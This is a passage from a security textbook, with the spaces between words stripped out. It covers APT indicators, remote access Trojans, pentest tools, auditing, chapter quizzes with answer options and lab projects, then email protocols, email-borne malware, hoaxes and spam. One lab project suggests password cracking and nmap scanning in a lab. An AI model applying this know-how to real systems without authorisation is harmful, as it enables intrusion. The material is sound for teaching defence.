elementsliketheabilitytoreade-mailstowatchforreportsofdetection,theycanaccomplishtheirgoalofstealingmaterials.Theirlong-term
objectivesaretoremainhiddenandundetected,whileharvestinginformationovermonthsandyears.APTsaretheattackmethodofchoicefornation-statesandindustrialespionage.
TechTip
SignsofAPTAttackThefollowingareindicationsofanAPTattack:
Off-hoursactivityIflogsdemonstrate“normal”activityattimeswhenyourworkersareathome,thisisasignofcompromisedaccounts.Lookforlargenumbersofoccurrences,asAPTattackerstendtousemultipleaccounts.
FindingmultiplebackdoorTrojans/remoteaccessTrojansWhensecurityscansbegintofindalotofmalware,thiscanbeasignofAPTs.
FindingunknownfilesAPTstendtobundleexfiltrationdataandkeepitinencryptedformbeforeslowlysiphoningitout.Discoveryoflargefilesofunknownorigincanbethesebundles.
Findingspearphishinge-mailsandpass-the-hashtoolsTheseadvancedattackmethodsareindicationsofanadvancedadversary.
StrangedataflowsThisisthemosttelltalesign.Findingunusualdataflows,movementofdatanotinthenormalcourseofbusiness,indicatesleakage.
RemoteAccessTrojansRemoteaccessTrojans(RATs)aremalwaredesignedtoenableremoteaccesstoamachine.Thisfunctionalityissimilartoremotedesktopadministration,butratherthanbeingvisibletoauser,itishiddeninthesystem.RATsenableattackerstohaveawaybackintoasystem.TheprincipaluseofaRATistoenablere-entrytoasystemand/orcollectdataonasystem.CommondatacollectionfunctionsperformedbyRATsincludecaptureofwebcamimages,keystrokesandmousemovements,andimagecaptureofthescreen.Whenthesedataelementsarecombinedtheycandefeatimage-basedpasswordsystems.CompleteshellaccesstotheOSistypical,enablingtheattackerfullaccesstothesystemandprocesses.
AkeyfunctionofaRATistoprovideaperiodicbeaconout,soeveniffirewallsandothersecuritydevicesblockunrequestedpackets,thebeaconfunctionmakesthemrequested,bypassingmanysecuritychecks.RATshaveexistedforyears,andmorerecently,customRATs,whichavoidAVdetection,arebeingusedinAPT-styleattacks.
ToolsThereareavarietyoftoolsetsusedbysecurityprofessionalsthatcouldalsobeusedformaliciouspurposes.Thesetoolsetsareusedbypenetrationtesterswhentestingthesecuritypostureofasystem.Thesametoolsinthehandsofanadversarycanbeusedformaliciouspurposes.
MetasploitMetasploitisaframeworkthatenablesattackerstoexploitsystems(bypasscontrols)andinjectpayloads(attackcode)intoasystem.Metasploitiswidelydistributed,powerful,andoneofthemostpopulartoolsusedbyattackers.Whennewvulnerabilitiesarediscoveredinsystems,Metasploitexploitmodulesarequicklycreatedinthecommunity,makingthistoolthego-totoolformostprofessionals.
BackTrack/KaliBackTrackisaLinuxdistributionthatispreloadedwithmanysecuritytools.ThecurrentversioniscalledKaliLinux.Itincludesawholehostofpreconfigured,preloadedtools,includingMetasploit,Social-EngineeringToolkit,andothers.
Social-EngineeringToolkitTheSocial-EngineeringToolkit(SET)isasetoftoolsthatcanbeusedto
targetattackstowardthepeopleusingsystems.Ithasappletsthatcanbeusedtocreatephishinge-mails,Javaattackcode,andothersocialengineering–typeattacks.TheSETisincludedinBackTrack/Kaliandotherdistributions.
CobaltStrikeCobaltStrikeisapowerfulapplicationthatcanreplicateadvancedthreatsandassistintheexecutionoftargetedattacksonsystems.CobaltStrikeexpandstheArmitagetool’scapabilities,addingadvancedattackmethods.
CoreImpactCoreImpactisanexpensivecommercialsuiteofpenetrationtesttools.Ithasawidespectrumoftoolsandprovenattackabilitiesacrossanenterprise.Althoughexpensive,thelevelofautomationandintegrationmakesthisapowerfulsuiteoftools.
BurpSuiteBurpSuitebeganasaportscannertoolwithlimitedadditionalfunctionalityinthearenaofinterceptingproxies,webapplicationscanning,andweb-basedcontent.BurpSuiteisacommercialtool,butitisreasonablypricedandwelllikedandutilizedinthepen-testingmarketplace.
AuditingAuditing,inthefinancialcommunity,isdonetoverifytheaccuracyandintegrityoffinancialrecords.Manystandardshavebeenestablishedinthefinancialcommunityabouthowtorecordandreportacompany’sfinancialstatuscorrectly.Inthecomputersecurityworld,auditingservesasimilar
function.Itisaprocessofassessingthesecuritystateofanorganizationcomparedagainstanestablishedstandard.Theimportantelementsherearethestandards.Organizationsfrom
differentcommunitiesmayhavewidelydifferentstandards,andanyauditwillneedtoconsidertheappropriateelementsforthespecificcommunity.Auditsdifferfromsecurityorvulnerabilityassessmentsinthatassessmentsmeasurethesecuritypostureoftheorganizationbutmaydosowithoutanymandatedstandardsagainstwhichtocomparethem.Inasecurityassessment,generalsecurity“bestpractices”canbeused,buttheymaylacktheregulatoryteeththatstandardsoftenprovide.Penetrationtestscanalsobeencountered—thesetestsareconductedagainstanorganizationtodeterminewhetheranyholesintheorganization’ssecuritycanbefound.Thegoalofthepenetrationtestistopenetratethesecurityratherthanmeasureitagainstsomestandard.Penetrationtestsareoftenviewedaswhite-hathackinginthatthemethodsusedoftenmirrorthosethatattackers(oftencalledblackhats)mightuse.
Oneofthekeymanagementprinciplesinvolvesthemeasurementofaprocess.Whenreferringtosecurity,untilitismeasured,oneshouldtakeanswerswithagrainofsalt.Logginginformationisonlygoodifyouexaminethelogsandanalyzethem.Securitycontrolswork,butauditingtheiruseprovidesassuranceoftheirprotection.
Youshouldconductsomeformofsecurityauditorassessmentonaregularbasis.Yourorganizationmightspendquiteabitonsecurity,anditisimportanttomeasurehoweffectivetheeffortshavebeen.Incertaincommunities,auditscanberegulatedonaperiodicbasiswithveryspecificstandardsthatmustbemeasuredagainst.Evenifyourorganizationisnotpartofsuchacommunity,periodicassessmentsareimportant.Manyparticularscanbeevaluatedduringanassessment,butata
minimum,thesecurityperimeter(withallofitscomponents,includinghost-basedsecurity)shouldbeexamined,aswellastheorganization’spolicies,procedures,andguidelinesgoverningsecurity.Employeetraining
isanotheraspectthatshouldbestudied,sinceemployeesarethetargetsofsocial-engineeringandpassword-guessingattacks.Securityaudits,assessments,andpenetrationtestsareabigbusiness,
andanumberoforganizationscanperformthemforyou.Thecostsofthesevarywidelydependingontheextentofthetestsyouwant,thebackgroundofthecompanyyouarecontractingwith,andthesizeoftheorganizationtobetested.Apowerfulmechanismfordetectingsecurityincidentsistheuseof
securitylogs.Forlogstobeeffective,however,theyrequiremonitoring.Monitoringofeventlogscanprovideinformationconcerningtheeventsthathavebeenlogged.Thisrequiresmakingdecisionsinadvanceabouttheitemstobelogged.Loggingtoomanyitemsusesalotofspaceandincreasestheworkloadforpersonnelwhoareassignedthetaskofreadingthoselogs.Thesameistrueforsecurity,access,audit,andapplication-specificlogs.Thebottomlineisthat,althoughlogsarevaluable,preparationisneededtodeterminethecorrectitemstologandthemechanismsbywhichlogsarereviewed.SecurityInformationEventManagement(SIEM)softwarecanassistinlogfileanalysis.
PerformRoutineAuditsAspartofanygoodsecurityprogram,administratorsmustperformperiodicauditstoensurethings“areastheyshouldbe”withregardtousers,systems,policies,andprocedures.Installingandconfiguringsecuritymechanismsisimportant,buttheymustbereviewedonaregularlyscheduledbasistoensuretheyareeffective,uptodate,andservingtheirintendedfunction.Herearesomeexamples,butbynomeansacompletelist,ofitemsthatshouldbeauditedonaregularbasis:
UseraccessAdministratorsshouldreviewwhichusersareaccessingthesystems,whentheyaredoingso,whatresourcestheyareusing,andsoon.Administratorsshouldlookcloselyforusersaccessingresourcesimproperlyoraccessinglegitimateresourcesatunusual
times.UserrightsWhenauserchangesjobsorresponsibilities,shewilllikelyneedtobeassigneddifferentaccesspermissions;shemaygainaccesstonewresourcesandloseaccesstoothers.Toensurethatusershaveaccessonlytotheresourcesandcapabilitiestheyneedfortheircurrentpositions,alluserrightsshouldbeauditedperiodically.
StorageManyorganizationshavepoliciesgoverningwhatcanbestoredon“company”resourcesandhowmuchspacecanbeusedbyagivenuserorgroup.Periodicauditshelptoensurethatnoundesirableorillegalmaterialsexistonorganizationalresources.
RetentionInsomeorganizations,howlongaparticulardocumentorrecordisstoredcanbeasimportantaswhatisbeingstored.Arecordsretentionpolicyhelpstodefinewhatisstored,howitisstored,howlongitisstored,andhowitisdisposedofwhenthetimecomes.Periodicauditshelptoensurethatrecordsordocumentsareremovedwhentheyarenolongerneeded.
FirewallrulesPeriodicauditsoffirewallrulesareimportanttoensurethefirewallisfilteringtrafficasdesiredandtohelpensurethat“temporary”rulesdonotendupaspermanentadditionstotheruleset.
Chapter15Review
LabManualExercisesThefollowinglabexercisesfromthecompanionlabmanual,PrinciplesofComputerSecurityLabManual,FourthEdition,providepracticalapplicationofmaterialcoveredinthischapter:
ChapterSummaryAfterreadingthischapterandcompletingtheexercises,youshouldunderstandthefollowingaspectsofattacksandmalware.
Describethevarioustypesofcomputerandnetworkattacks,includingdenial-of-service,spoofing,hijacking,andpasswordguessing
Understandhowdenial-of-service(DoS)anddistributeddenial-of-service(DDoS)attacksareperformedandthedefensesagainstthem.
Bothpacketheadersande-mailheaderscanbespoofedtotakeadvantageofthetrustusersplaceinthesedataelements,evenwhentheyarenotprotectedfromchange.
Understandhowsessionhijackingandman-in-the-middleattacksareperformedandwhatthedefensesareagainsttheseattacks.
Passwordsystemscanhavenumerousvulnerabilities,somebasedonthesystemandsomeonthechoiceofpassworditself.
Identifythedifferenttypesofmalicioussoftwarethatexist,includingviruses,worms,Trojanhorses,logicbombs,timebombs,androotkits
Virusesarepiecesofmalwarethatrequireafiletoinfectasystem.
Wormsarepiecesofmalwarethatcanexistwithoutinfectingafile.
Trojanhorsesarepiecesofmalwaredisguisedassomethingelse,somethingtheuserwantsorfindsuseful.
Logicbombstriggerwhenspecificeventsoccurincode,allowinganattacktobetimedagainstanevent.
Timebombsaredelayedmalwaredesignedtooccurafterasetperiodoftimeoronaspecificdate.
Rootkitsarepiecesofmalwaredesignedtoalterthelower-levelfunctionsofasysteminamannertoescapedetection.
Explainhowsocialengineeringcanbeusedasameanstogainaccesstocomputersandnetworks
Socialengineeringattacksareattacksagainsttheoperatorsandusersofasystem.
Trainingandawarenessisthebestdefensivemeasureagainstsocialengineering.
Describetheimportanceofauditingandwhatshouldbeaudited
Loggingisimportantbecauselogscanprovideinformationassociatedwithattacks.
Auditingisanessentialcomponentofacomprehensivesecuritysystem.
KeyTermsauditing(497)backdoor(472)birthdayattack(492)
botnet(472)bufferoverflow(493)denial-of-service(DoS)attack(474)distributeddenial-of-service(DDoS)attack(476)DNSkiting(488)drive-bydownloadattack(494)integeroverflow(493)logicbomb(471)malware(466)man-in-the-middleattack(483)nullsession(478)pharming(485)phishing(485)ransomware(473)replayattack(484)rootkit(470)sequencenumber(482)smurfattack(480)sniffing(479)spearphishing(485)spoofing(480)spyware(471)SYNflood(475)TCP/IPhijacking(483)Trojan(470)typosquatting(494)virus(466)worm(469)zombie(476)
KeyTermsQuizUsetermsfromtheKeyTermslisttocompletethesentencesthatfollow.Don’tusethesametermmorethanonce.Notalltermswillbeused.
1.ChangingasourceIPaddressformaliciouspurposeisanexampleof_______________.
2.A(n)_______________isawaybackintoamachineviaanunauthorizedchannelofaccess.
3.Amaliciousproxycouldcreatea(n)_______________attack.4.AbusingtheTCPhandshakeinanefforttooveruseserverresources
canbedoneusinga(n)_______________.
5.ThemainTCP/IPdefenseagainstaman-in-the-middleattackistheuseofa(n)_______________.
6.HoldingaDNSnamewithoutpayingiscalled_______________.7.Whenakeyloggerisinstalledasmalware,itisreferredtoas
_______________.
8.Renderingaresourceuselessiscalleda(n)_______________.9.Anattackdesignedtomatchanyuser’spasswordasopposedtoa
specificuser’spasswordisanexampleofa(n)_______________.
10.ANICcanbesetinpromiscuousmodetoenable_______________.
Multiple-ChoiceQuiz1.ASYNfloodisanexampleofwhattypeofattack?
A.Maliciouscode
B.Denial-of-service
C.Man-in-the-middle
D.Spoofing
2.Anattackinwhichtheattackersimplylistensforalltrafficbeingtransmittedacrossanetwork,inthehopeofviewingsomethingsuchasauserIDandpasswordcombination,isknownas:
A.Aman-in-the-middleattack
B.Adenial-of-serviceattack
C.Asniffingattack
D.Abackdoorattack
3.Whichattacktakesadvantageofatrustedrelationshipthatexistsbetweentwosystems?
A.Spoofing
B.Passwordguessing
C.Sniffing
D.Brute-force
4.Inwhattypeofattackdoesanattackerresendtheseriesofcommandsandcodesusedinafinancialtransactiontocausethetransactiontobeconductedmultipletimes?
A.Spoofing
B.Man-in-the-middle
C.Replay
D.Backdoor
5.Rootkitsarechallengingsecurityproblemsbecause:A.Theycanbeinvisibletotheoperatingsystemandenduser.
B.Theirtruefunctionalitycanbecloaked,preventinganalysis.
C.Theycandovirtuallyanythinganoperatingsystemcando.
D.Alloftheabove.
6.Anattackinwhichanattackerattemptstolieandmisrepresenthimselfinordertogainaccesstoinformationthatcanbeusefulinanattackisknownas:
A.Socialscience
B.White-hathacking
C.Socialengineering
D.Socialmanipulation
7.Thefirststepinanattackonacomputersystemconsistsof:A.Gatheringasmuchinformationaboutthetargetsystemas
possible
B.Obtainingasmuchinformationabouttheorganizationinwhichthetargetliesaspossible
C.Searchingforpossibleexploitsthatcanbeusedagainstknownvulnerabilities
D.Searchingforspecificvulnerabilitiesthatmayexistinthetarget’soperatingsystemorsoftwareapplications
8.Thebestwaytominimizepossibleavenuesofattackforyoursystemisto:
A.Installafirewallandcheckthelogsdaily.
B.Monitoryourintrusiondetectionsystemforpossibleattacks.
C.LimittheinformationthatcanbeobtainedonyourorganizationandtheservicesthatarerunbyyourInternet-visiblesystems.
D.Ensurethatallpatcheshavebeenappliedfortheservicesthatareofferedbyyoursystem.
9.Awar-drivingattackisanattempttoexploitwhattechnology?A.Fiber-opticnetworks,whosecablesoftenrunalongroadsand
bridges
B.Cellulartelephones
C.Thepublicswitchedtelephonenetwork(PSTN)
D.Wirelessnetworks
10.Maliciouscodethatissettoexecuteitspayloadonaspecificdateorataspecifictimeisknownas:
A.Alogicbomb
B.ATrojanhorse
C.Avirus
D.Atimebomb
EssayQuiz1.Compareandcontrastportscanningandpingsweeps.2.Whatisthebestpracticetoemploytomitigatemalwareeffectsona
machine?
LabProjects
•LabProject15.1UsingtheInternet,researchpassword-crackingtools.Then,usingatoolofchoice,examinehoweasyitistocrackpasswordsonWindows-andUNIX-basedsystems.Createaseriesofaccounts
withdifferentcomplexitiesofpasswordsandseehowwelltheyfare.
•LabProject15.2Obtainacopyofthenmapscanningtool.Explorethevariouscommand-lineoptionstoscannetworks,fingerprintoperatingsystems,andperformothernetwork-mappingfunctions.
Note:Studentsshouldtrytheseoptions,butonlyinalabenvironment,notacrosstheInternetfromtheirhomeISP.
chapter16 E-MailandInstantMessaging
The“free”distributionofunwelcomeormisleadingmessagestothousandsofpeopleisanannoyingandsometimesdestructiveuseoftheInternet’sunprecedentedefficiency.
E
—BILLGATES,NEWYORKTIMES,1998
Inthischapter,youwilllearnhowto
Describesecurityissuesassociatedwithe-mail
Implementsecuritypracticesfore-mail
Detailthesecurityissuesofinstantmessagingprotocols
-mailisthemostpopularapplicationoncompanynetworks.Withover2.6billione-mailusers,4.3billione-mailaccountsandmorethan200billione-mailsperyear,theusagenumbersarestaggering.Thesplit
betweenbusinessandpersonalemailis55/45percent,respectively.Thetotalamountofspamisunknown,butevenafterextensivefiltering,spamaveragesnearly10percentofinboxtraffic.
HowE-MailWorksE-mailstartedwithmailboxprogramsonearlytime-sharingmachines,allowingresearcherstoleavemessagesforothersusingthesamemachine.Thefirstintermachinee-mailwassentin1972,andanewerainperson-to-personcommunicationwaslaunched.E-mailproliferated,butitremainedunsecured,onlypartlybecausemoste-mailissentinplaintext,providingnoprivacyinitsdefaultform.Currente-mailinitsuseisnotdifferentfromitsearlierversions;it’sstillasimplewaytosendarelativelyshorttextmessagetoanotheruser.Users’dependenceone-mailhasgrownwiththenumberofpeopleaccessingtheInternet.Internete-maildependsonthreeprimaryprotocols,SMTP,POP3,and
IMAP.SimpleMailTransferProtocol(SMTP)isthemethodbywhichmailissenttotheserveraswellasfromservertoserver.SMTPbydefaultusesTCPport25.POP3standsforPostOfficeProtocolversion3,whichbydefaultusesTCPport110.POP3isamethodbywhichaclientcomputermayconnecttoaserveranddownloadnewmessages.POP3has
beenpartlyreplacedbyIMAP,orInternetMessageAccessProtocol,whichusesportTCP143bydefault.IMAPissimilartoPOP3inthatitallowstheclienttoretrievemessagesfromtheserver,butIMAPtypicallyworksingreatersynchronization;forexample,e-mailsareleftontheserveruntiltheclientdeletesthemintheclient,atwhichtimeIMAPinstructstheservertodeletethem.Ase-mailservicesbecamemorestandardized,themethodsoftransmissionbecameeasiertoattackastheywerenotstrangeproprietaryprotocols.Also,astheworldbecamemoreconnected,thereweremanymoreavailabletargetsforthemalwareandcommerciale-mails.
TechTip
E-mailandFirewallsFore-mailapplicationstoworkwithe-mailservers,theyneedtocommunicateacrossspecificchannels.Toensurecommunication,TCPports25,110,and143needtobeopenonclientsthatneedtoconnecttomailservers.ThisisforSMTP,POP3,andIMAP,respectively.
SecureversionsofthecommoncommunicationprotocolsexistviatheSTARTTLSmethod.STARTTLSisameansofusingTransportLayerSecurity(TLS)tosecureacommunicationchannelfortext-basedcommunicationprotocols.Table16.1showstheportassignmentsassociatedwithSTARTTLS.
Table16.1 STARTTLSPortAssignments
E-mailappearstobeaclient-to-clientcommunication,betweensenderandreceiver.Inreality,alotofstepsareinvolved,asshowninFigure16.1anddescribedhere:
•Figure16.1Howe-mailworks
1.Ausercomposesandsendsane-mailfromtheuser’sclientmachine.2.Thee-mailissenttotheclient’se-mailserver.InanInternetserviceprovider(ISP)environment,thiscouldbeviatheISP.Inthecaseofwebmail,itisthemailservice(Gmail,Hotmail/Live,etc.).Inacorporateenvironmentitisthecorporatemailserver.
3.a.Thereceivinge-mailserverscansthee-mailforviruses,malware,andotherthreats.
b.ThemailserverusesDNStoobtaintherecipiente-mailserveraddressviaanMXrecord.
4.Themailserverpreparesthee-mailfortransitacrosstheInternettotherecipient’smailserver.
5.Thee-mailisroutedacrosstheInternet.6.Thereceivinge-mailserverscansthee-mailforviruses,malware,
andotherthreats.
7.Thee-mailispassedtotherecipient’sin-box,whereitcanberead.
Thislistofstepsleavesoutalotofdetails,butitprovidesthemainstepsine-mailtransference.Thestepsareremarkablysimilarforinstantmessagingapplicationsaswell.Ratherthanin-boxesande-mailasamedium,theinstantmessagingappsdeliverthetextmessagesdirectlytothescreenoftheapp.Intechnicalterms,theapplicationonthesender’smachineisreferredto
asamailuseragent(MUA),andthemailserverisamailtransferagent(MTA).Therecipient’smailserverisreferredtoasamaildeliveryagent(MDA).Thesetermsareusedwhendiscussingmailtransferstoprovideaccuracyintheconversation.ForcommunicationfromtheMUAtotheMTA,SMTP(port25)isused,andcommunicationfromMTAtoMTAisalsoSMTP.TheprotocolusedforcommunicationfromtheMDAtotheMUAontherecipientmachineistypicallyPOP/IMAP.
E-MailStructureE-mailisstructuredintwoelements,aheaderandthebody.TheentiremessageissentviaplainASCIItext,withattachmentsincludedusingBase64encoding.Thee-mailheaderprovidesinformationforthehandlingofthee-mailbetweenMUAs,MTAs,andMDAs.Thefollowingisasamplee-mailheader:
Thespecificelementsshowninthisheaderwillbeexaminedthroughoutthischapter.Whatisimportanttonoteisthattheformatofthemessageanditsattachmentsareinplaintext.
MIMEWhenamessagehasanattachment,theprotocolusedtodeliverthemessageisMultipurposeInternetMailExtensions(MIME).Thisprotocolallowstheexchangeofdifferentkindsofdataacrosstext-basede-mailsystems.WhenMIMEisused,itismarkedintheheaderofthee-mail,alongwithsupportingelementstofacilitatedecoding.ThefollowingisanexcerptfromaheaderthathasMIMEelements:
Thee-mailtexthasbeenreplacedwith<HTMLE-MAILmessagegoeshere>andtheJPEGimageistruncated,butthestructureofthesampleshowshowcontentcanbeencodedandincludedinane-mail.
SecurityofE-MailE-mailcanbeusedtomoveavarietyofthreatsacrossthenetwork.Fromspam,toviruses,toadvancedmalwareinspear-phishingattacks,e-mail
canactasatransmissionmedium.Spamisthemostcommonattackbutisnowjustanuisance;themajorityisnowmostlycleanedupbymailserverfiltersandsoftware.Thee-mailhoaxhasbecomeanotherregularoccurrence;Internet-based
urbanlegendsarespreadthroughe-mail,withusersforwardingtheminseeminglyendlessloopsaroundtheglobe.And,ofcourse,peoplestillhaven’tfoundagoodwaytoblockubiquitousspame-mails(asamplingofwhichisshowninFigure16.2),despitetheremarkableadvanceofeveryothertechnology.
•Figure16.2Atypicallistofspame-mails
E-mailsecurityisultimatelytheresponsibilityofusersthemselves,becausetheyaretheoneswhowillactuallybesendingandreceivingthemessages.However,securityadministratorscangiveusersthetoolsthey
needtofightmalware,spam,andhoaxes.Secure/MultipurposeInternetMailExtensions(S/MIME)andPrettyGoodPrivacy(PGP)aretwopopularmethodsusedforencryptinge-mail,asdiscussedlaterinthechapter.Server-basedanddesktop-basedvirusprotectioncanhelpagainstmaliciouscode,andspamfiltersattempttoblockallunsolicitedcommerciale-mail.E-mailusersneedtobeeducatedaboutsecurityaswell,however,becausethepopularityandfunctionalityofe-mailisonlygoingtoincreasewithtime.Instantmessaging(IM),whilenotpartofthee-mailsystem,issimilar
toe-mailinmanyrespects,particularlyinthesensethatitiscommonlyplaintextandcantransmitfiles.IM’shandlingoffilesopenstheapplicationtovirusexploitationjustlikee-mail.IMhasexperiencedaboominpopularityinthelastfewyears,sowewilllookatsomepopularIMprogramslaterinthischapter,suchasAOLInstantMessenger,showninFigure16.3.
•Figure16.3AOLInstantMessengerisapopularinstantmessagingprogram.
MaliciousCode
Virusesandwormsarepopularprogramsbecausetheymakethemselvespopular.Whenviruseswereconstrainedtoonlyonecomputer,theyattemptedtospreadbyattachingthemselvestoeveryexecutableprogramthattheycouldfind.Thisworkedoutverywellfortheviruses,becausetheycouldpiggybackontoafloppydiskwithaprogramthatwasbeingtransferredtoanothercomputer.Theviruswouldtheninfectthenextcomputer,andthenextcomputerafterthat.Whileoftensuccessful,viruspropagationwasslow,andfloppiescouldbescannedforviruses.
ExamTip:Virusesandwormsbothcancarrymaliciouspayloadsandcausedamage.Thedifferenceisinhowtheyaretransmitted:virusesrequireafiletoinfect,whereaswormscanexistindependentlyofafile.
Theadventofcomputernetworkswasacomputerviruswriter’sdream,allowingvirusestoattempttoinfecteverynetworksharetowhichthecomputerwasattached.Thisextendedthevirus’sreachfromasetofmachinesthatmightshareafloppydisktoeverymachineonthenetwork.Becausethee-mailprotocolpermitsuserstoattachfilestoe-mailmessages(seeFigure16.4),virusescantravelbye-mailfromonelocalnetworktoanother,anywhereontheInternet.Thischangedthenatureofvirusprograms,sincetheyoncewerelocalizedbutnowcouldspreadvirtuallyeverywhere.E-mailgavethevirusaglobalreach.
•Figure16.4Virusescommonlyspreadthroughe-mailattachments.
WhenactivecontentwasdesignedfortheWeb,intheformofJavaandActiveXscripts,thesescriptswereinterpretedandrunbythewebbrowser.E-mailprogramsalsowouldrunthesescripts,andthat’swhenthetrouble
began.Somee-mailprograms,mostnotablyMicrosoftOutlook,useapreviewpane,whichallowsuserstoreade-mailswithoutopeningtheminthefullscreen(seeFigure16.5).
•Figure16.5Thepreviewpaneontherightcanexecutecodeine-mails
withoutopeningthem.
TechTip
HTMLe-mailHTMLe-mailcancarryembeddedinstructionstodownloadorrunscriptsthatcanbelaunchedfromthepreviewpaneinsomee-mailprograms,withoutrequiringthattheuseractivelylaunchtheattachedprogram.
Unfortunately,thispreviewstillactivatesallthecontentinthee-mailmessage,andbecauseOutlooksupportsVisualBasicscripting,itisvulnerabletoe-mailworms.Auserdoesn’tneedtoruntheprogramorevenopenthee-mailtoactivatetheworm—simplypreviewingthee-mailinthepreviewpanecanlaunchthemaliciouscontent.ThisformofautomaticexecutionwastheprimaryreasonforthespreadoftheILOVEYOUworm.
TechTip
E-MailHygieneAlle-mailshouldbescannedformalware,spam,andotherunwanteditemsbeforeittrulyentersthee-mailsysteminanorganization.Thisreducesriskandalsoreducesthecostsofbackup.Withspamcomprisingthemajorityofreceivede-mails,nothavingtobackitupsavesalotofspace.
Allmalwareisasecuritythreat,withtheseveraldifferenttypeshavingdifferentcountermeasures.Theantivirussystemsthatwehaveusedforyearshaveprogressedtotryandstopallformsofmalicioussoftware,buttheyarenotapanacea.Wormpreventionalsoreliesonpatchmanagementoftheoperatingsystemandapplications.Virusesareuser-launched,andsinceoneofthemostcommontransfermethodsforvirusesisthroughe-mail,thepeopleusingthee-mailsystemcreatethefrontlineofdefense
againstviruses.Inadditiontoantivirusscanningoftheuser’ssystem,andpossiblyane-mailvirusfilter,usersneedtobeeducatedaboutthedangersofviruses.Althoughthegreatmajorityofusersarenowawareofvirusesandthe
damagetheycancause,moreeducationmaybeneededtoinstructthemonthespecificthingsthatneedtobeaddressedwhenavirusisreceivedviae-mail.Thesecanvaryfromorganizationtoorganizationandfrome-mailsoftwaretoe-mailsoftware;however,someusefulexamplesofgoodpracticesinvolveexaminingalle-mailsforaknownsourceaswellasaknowndestination,especiallyifthee-mailshaveattachments.Strangefilesorunexpectedattachmentsshouldalwaysbecheckedwithanantivirusprogrambeforeexecution.Usersalsoneedtoknowthatsomevirusescanbeexecutedsimplybyopeningthee-mailorviewingitinthepreviewpane.Educationandproperadministrationisalsousefulinconfiguringthee-mailsoftwaretobeasvirusresistantaspossible—turningoffscriptingsupportandthepreviewpanearegoodexamples.Manyorganizationsoutlinespecificuserresponsibilitiesfore-mail,similartonetworkacceptableusepolicies.Someexamplesincludeusinge-mailresourcesresponsibly,avoidingtheinstallationofuntrustedprograms,andusinglocalizedantivirusscanningprograms,suchasAVG.
Anotherprotectionistocarefullycreatevirus-scanningprocedures.Ifpossible,performvirusscansoneverye-mailasitcomesintothecompany’se-mailserver.Thisisactuallytheoneplacethatspammayproveuseful.Theexplosioninspammailhasdriventheadoptionofe-mailfilteringgatewaysdesignedtogreatlyreducespammessages.Thesespecializede-mailservershaveevolvedtoattempttoprotectagainstvirus
threatsaswellasspam.Someuserswillalsoattempttoretrievee-mailoffsitefromanormalISPaccount,whichcanbypasstheserver-basedvirusprotection,soeverymachineshouldalsobeprotectedwithahost-basedvirusprotectionprogramthatscansallfilesonaregularbasisandperformschecksoffilesupontheirexecution.Whilethesestepswillnoteliminatethesecurityrisksofmaliciouscodeine-mail,theywilllimitinfectionandhelptokeeptheproblemtomanageablelevels.
HoaxE-MailsE-mailhoaxesaremostlyanuisance,buttheydocosteveryone,notonlyinthetimewastedbyreceivingandreadingthee-mails,butalsointheInternetbandwidthandserverprocessingtimetheytakeup.E-mailhoaxesareglobalurbanlegends,perpetuallytravelingfromonee-mailaccounttothenext,andmosthaveacommonthemeofsomestoryyoumusttelltenotherpeopleaboutrightawayforgoodluckorsomevirusthatwillharmyourfriendsunlessyoutellthemimmediately.Hoaxesaresimilartochainletters,butinsteadofpromisingareward,thestoryinthee-mailistypicallywhatproducestheaction.
Forwardinghoaxe-mailsandotherjokes,funnymovies,andnon-work-relatede-mailsatworkcanbeaviolationofyourcompany’sacceptableusepolicyandresultindisciplinaryactions.
HoaxeshavebeencirclingtheInternetformanyyears,andmanywebsitesarededicatedtodebunkingthem,suchasSnopes.com(seeFigure16.6).
•Figure16.6Snopesisanonlinereferenceforurbanlegendscommoninhoaxe-mails.
Themostimportantthingtodointhiscaseiseducatee-mailusers:theyshouldbefamiliarwithahoaxortwobeforetheygoonline,andthey
shouldknowhowtosearchtheInternetforhoaxinformation.UsersneedtoapplythesamecommonsenseontheInternetthattheywouldinreallife:Ifitsoundstoooutlandishtobetrue,itprobablyisafabrication.Thegoalofeducationabouthoaxesshouldbetochangeuserbehaviortodeletethehoaxe-mailandnotsenditon.
UnsolicitedCommercialE-Mail(Spam)Everye-mailuserhasreceivedspam,andusuallydoesonadailybasis.Spamreferstounsolicitedcommerciale-mailwhosepurposeisthesameasthejunkmailyougetinyourphysicalmailbox—ittriestopersuadeyoutobuysomething.ThetermspamcomesfromaskitonMontyPython’sFlyingCircus,wheretwopeopleareinarestaurantthatservesonlythepottedmeatproduct.Thisconceptoftherepetitionofunwantedthingsisthekeytoe-mailspam.
ExamTip:Unsolicitedcommerciale-mailisreferredtoasspam.
Thefirstspame-mailwassentin1978byaDECemployee.However,thefirstspamthatreallycapturedeveryone’sattentionwasin1994,whentwolawyerspostedacommercialmessagetoeveryUsenetnewsgroup.ThiswastheoriginofusingtheInternettosendonemessagetoasmanyrecipientsaspossibleviaanautomatedprogram.Commerciale-mailprogramshavetakenover,resultinginthevarietyofspamthatmostusersreceiveintheirin-boxeseveryday.Botnetresearchershavereportedthatamillion–plusinfectedmachinessendmorethan100billionspame-mailseveryday.AccordingtotheSymantecmonthlyStateofSpamreportinJuly2009,over90percentofe-mailsentworldwideisspam.Theappealtothepeoplegeneratingthespamistheextremelylowcost
peradvertisingimpression.Thesendersofspame-mailcangenerallysendthemessagesforlessthanacentapiece.Thisismuchlessexpensivethan
moretraditionaldirectmailorprintadvertisements,andthislowcostwillensurethecontinuedgrowthofspame-mailunlesssomethingisdoneaboutit.Theamountofspambeingtransmittedeventuallyspurredfederalauthoritiesintoaction.Inlate2003theControllingtheAssaultofNon-SolicitedPornographyandMarketingAct(CAN-SPAM)wassignedintolaw.ThislawgavetheFederalTradeCommission(FTC)authoritytodefinethestandardsofspame-mailandenforcetheotherprovisionsoftheact.Whileseveralspammershavebeencaughtandprosecutedunderthisact,ithasnotbeenrestrictiveenoughtoseverelylimitspam.Thishasforcedmostpeopletoseekouttechnicalsolutionstothespamproblem.
TechTip
ControllingPort25onMailServersSMTPauthenticationforcestheuserswhouseyourservertoobtainpermissiontosendmailbyfirstsupplyingausernameandpassword.ThishelpstopreventopenrelayandabuseofyourserverandishighlyrecommendedwhenyourmailserverhasaroutedIPaddress.Thisensuresthatonlyknownaccountscanuseyourserver’sSMTPtosende-mail.ThenumberofconnectionstoanSMTPservershouldbelimitedbasedonthespecifications
oftheserverhardware(memory,NICbandwidth,CPU,etc.)anditsnominalloadperday.LimitingconnectionsisusefultomitigatespamfloodsandDoSattacksthattargetyournetworkinfrastructure.
